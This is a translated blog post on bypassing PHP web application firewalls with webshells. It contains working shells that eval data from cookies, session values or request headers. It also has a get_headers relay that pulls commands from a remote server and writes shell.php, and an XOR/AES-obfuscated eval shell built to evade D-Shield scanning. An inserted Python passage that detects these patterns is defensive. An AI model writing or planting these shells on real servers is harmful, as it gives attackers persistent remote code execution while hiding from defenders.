Discussion on PHP using some functions bypass WAF
2022-07-28 01:40:00 【goddemon】
Preface:
I wrote an article the other day, "From black to white", which used a feature of echo to write the webshell ("horse") step by step.
After reading the masters' comments I studied the reasons
and learned a lot,
such as why POST goes missing when writing a shell on Linux,
with the reasons and solutions such as base64, why it does not exist, and why wget and nc cannot connect back.
I also ran into a problem that one master mentioned here: `$_POST`, spaces and similar characters cannot be written in. I also happened to see an article written by a master on a WeChat official account.
The link is as follows:
https://mp.weixin.qq.com/s/hRwYtDZ-dqqznhS3LdSxUA
It mentioned a tip:
using get_headers to get around the WAF. This immediately caught my interest, because many WAFs intercept based on the POST and GET packets. If I can move the controlled parameter content into the headers, wouldn't it pass reliably?
I began to study this tip for practical use and found it interesting, so I am sharing it with you here.
Text
In principle: personally, I feel it is a little like a relay ("transit") webshell, which can break through more restrictions.
1. The code layer filters POST as well as GET
This kind of bypass is quite simple: pass the parameter directly in the session, cookie or headers and you can bypass it.
# Passing parameters via cookie
<?php
eval(base64_decode($_COOKIE["PHPSESSID"]));
?>
# Passing parameters via session
<?php
eval($_SESSION['dmeo']=base64_decode($_COOKIE["PHPSESSID"]));
?>

2. The code layer filters the content of $_POST and $_GET
Idea and method 1
Use getallheaders to get around it.
Applies to PHP versions above 5.5.
<?php
session_start();
eval(getallheaders()['Demo']);
?>
Below 5.5 the function does not seem to exist; above 5.5 it works.
Idea and method 2
Use get_headers.
The server-side content is as follows (the base64 content at the end can be whatever you want, such as an Ice Scorpion shell; base64 encoding works there too):
<?php
header('assert');
header("file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbJzEnXSk7ID8+'))");
The content of the webshell is as follows. This one applies to 7.1 and below and is for assert. If you want it to work on higher versions, specify eval and assert and that will do.
<?php
$a=get_headers('http:// The server /1.php');
$b=str_replace(":","",$a[6]);
$b=str_replace(" ","",$b);
$x=str_replace(":","",$a[7]);
$x=str_replace(" ","",$x);
$b($x);
?>
<?php
$a=get_headers('http:// The server /1.php');
$x=str_replace(":","",$a[7]);
$x=str_replace(" ","",$x);
eval($x);
?>
Then visit 3.php, and shell.php is created successfully.
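A source-review check for the cookie, getallheaders and get_headers variants above, written as an added example (not code from the original post): it flags PHP source where `eval`/`assert` or a variable-function call consumes data from a channel that a POST/GET-only filter never inspects. The names `scan`, `tainted_vars` and `SAMPLES`, and the host `server.example`, are hypothetical.

```python
import re

# Inputs that a POST/GET-only filter never inspects (the channels this page uses).
SOURCES = re.compile(
    r"\$_COOKIE|\$_SESSION|\$_SERVER\s*\[\s*['\"]HTTP_|"
    r"\b(?:getallheaders|apache_request_headers|get_headers)\s*\(")
ASSIGN = re.compile(r"(\$\w+)\s*(?:\[[^\]]*\])?\s*=(?![=>])\s*([^;]*);")
SINK = re.compile(r"\b(eval|assert)\s*\(([^;]*)\)\s*;")
DYNCALL = re.compile(r"(\$\w+)\s*\(")
VAR = re.compile(r"\$\w+")


def is_tainted(expr, tainted):
    """True if expr reads a source directly or mentions a tainted variable."""
    return bool(SOURCES.search(expr)) or bool(tainted & set(VAR.findall(expr)))


def tainted_vars(src):
    """Propagate taint through plain assignments until a fixed point."""
    tainted, changed = set(), True
    while changed:
        changed = False
        for name, rhs in ASSIGN.findall(src):
            if name not in tainted and is_tainted(rhs, tainted):
                tainted.add(name)
                changed = True
    return tainted


def scan(src):
    """Return sorted (kind, detail) findings for one PHP source string."""
    tainted = tainted_vars(src)
    findings = {("exec-sink", fn) for fn, arg in SINK.findall(src)
                if is_tainted(arg, tainted)}
    findings |= {("dynamic-call", v) for v in DYNCALL.findall(src) if v in tainted}
    return sorted(findings)


# Constructed samples mirroring the patterns on this page, plus one benign file.
# server.example is a placeholder host, not a value from the original post.
SAMPLES = {
    "cookie.php": r'''<?php eval(base64_decode($_COOKIE["PHPSESSID"])); ?>''',
    "headers.php": r'''<?php eval(getallheaders()['Demo']); ?>''',
    "remote.php": r'''<?php $a=get_headers('http://server.example/1.php');
$b=str_replace(":","",$a[6]); $x=str_replace(":","",$a[7]); $b($x); ?>''',
    "theme.php": r'''<?php $t = htmlspecialchars($_COOKIE["theme"]); echo $t; ?>''',
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(name, scan(src))
```

Regex matching is a triage heuristic, not a PHP parser: it does not follow taint through function return values, so the `eval(b())` wrapper shown further down needs a token-based or behavioural check.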
D-Shield detection result 1
No evasion was done here. If you want static and dynamic evasion, in fact it only takes a small change.
It can be improved by combining it with this encryption algorithm, and then it can pass dynamic detection.
To get the ball rolling, here is an encryption algorithm + shellcode: static evasion, dynamic passable 60; just change it with this one.
This is the encryption algorithm, a.php
<?php
$key1 = '123456';
$key = "password";
$fun = $_GET['func'];
for($i=0;$i<strlen($fun);$i++){
$fun[$i] = $fun[$i]^$key[$i+1&7];
}
echo $fun;
$encrypt = openssl_encrypt($fun, 'AES-128-ECB', $key1, 0);
echo " After encryption : ".$encrypt;
?>
This is the shellcode part,
shell.php
<?php
function b(){
$x = "password";
$key1 = '123456';
$fun = openssl_decrypt($_GET['func'], 'AES-128-ECB', $key1, 0);
for($i=0;$i<strlen($fun);$i++){
$z= $fun[$i] ;
$fun[$i] =$z^$x[$i+1&7];
}
return $fun;
}
function a(){
eval(b());
}
a();



Actual combat
Combined with the append idea, write the content step by step and you can finish it.
After appending the content several times, access it to get a shell.